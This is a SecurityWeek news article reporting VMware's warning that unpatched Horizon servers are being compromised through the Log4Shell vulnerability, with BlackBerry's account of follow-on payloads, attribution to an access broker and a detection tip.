Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Cybercrime

VMware Warns of Log4j Attacks Targeting Horizon Servers

VMware is urging customers to patch their VMware Horizon instances as these systems have been targeted in a recent wave of attacks exploiting the Log4Shell vulnerability.

VMware is urging customers to patch their VMware Horizon instances as these systems have been targeted in a recent wave of attacks exploiting the Log4Shell vulnerability.

Tracked as CVE-2021-44228, the security flaw was identified in early December 2021 in the Apache Log4j logging utility, and has since been exploited in attacks by both cybercriminals and state-sponsored threat actors.

Soon after the vulnerability was discovered, VMware confirmed that Horizon products are impacted and released patches, yet customers are slow in applying these patches.

Now, the company says that, despite its efforts, attackers are successful in compromising organizations by targeting VMware Horizon products that haven’t been patched against Log4Shell.

“VMware Horizon products are vulnerable to critical Apache Log4j/Log4Shell vulnerabilities unless properly patched or mitigated using the information provided in our security advisory, VMSA 2021-0028, which was first published on Dec. 10, 2021 and updated regularly with new information,” VMware said in an alert.

[ READ: Attackers Hitting VMWare Horizon Servers With Log4j Exploits ]

“Customers who have not applied either the patch or the latest workaround provided in VMware’s security advisory are at risk of being compromised—or may have already been compromised—by threat actors who are leveraging the Apache Log4shell vulnerability to actively compromise unpatched, internet-facing Horizon environments,” the company continues.

While SaaS products are immediately patched by the company providing the software, organizations using on-premises software products need to apply the available security updates on their own, VMware notes.

Advertisement. Scroll to continue reading.

The company says it has been in contact with customers directly to guide them through the patching process, but some organizations have not patched yet. VMware urges these customers to implement the security updates as soon as possible, in response to Log4j vulnerability exploitation.

[ READ: Fewer-Than-Expected Log4j Attacks, but Mirai Joins the Fray ]

BlackBerry too has observed an increase in the number of Log4j attacks targeting the Tomcat service used by VMware Horizon and says that organizations can reliably detect potential compromise by “monitoring child processes of the ws_TomcatService.exe parent process.”

Following the initial compromise, PowerShell commands are used to download a second-stage payload, which may include cryptomining malware, ransomware, or other malicious tools. In some cases, a Cobalt Strike beacon was deployed.

BlackBerry believes that the attacks were conducted by an initial access broker (IAB) tracked as Prophet Spider. After compromising enterprise networks, the threat actor usually sells access to ransomware operators.

“When an initial access broker group takes interest in a vulnerability whose scope may never be known, this gives us a good indication that they see significant value in its exploitation. It’s likely that we will continue to see criminal groups exploring the opportunities of the Log4Shell vulnerability in the near future, as IT teams and users continue to scramble to address these vulnerabilities,” BlackBerry concludes.

Related: Log4Shell Tools and Resources for Defenders – Continuously Updated

Related: SolarWinds Patches Serv-U Vulnerability Propagating Log4j Attacks

Related: Ukraine Attacks Involved Exploitation of Log4j, October CMS Vulnerabilities

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.

Register

SecurityWeek’s Ransomware Resilience and Recovery Summit helps businesses to plan, prepare, and recover from a ransomware incident.

Register

Expert Insights

Related Content

Vulnerabilities

Less than a week after announcing that it would suspended service indefinitely due to a conflict with an (at the time) unnamed security researcher...

Cybercrime

The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Cybercrime

As it evolves, web3 will contain and increase all the security issues of web2 – and perhaps add a few more.

Cybercrime

Luxury retailer Neiman Marcus Group informed some customers last week that their online accounts had been breached by hackers.

Data Breaches

OpenAI has confirmed a ChatGPT data breach on the same day a security firm reported seeing the use of a component affected by an...

IoT Security

A group of seven security researchers have discovered numerous vulnerabilities in vehicles from 16 car makers, including bugs that allowed them to control car...

Vulnerabilities

A researcher at IOActive discovered that home security systems from SimpliSafe are plagued by a vulnerability that allows tech savvy burglars to remotely disable...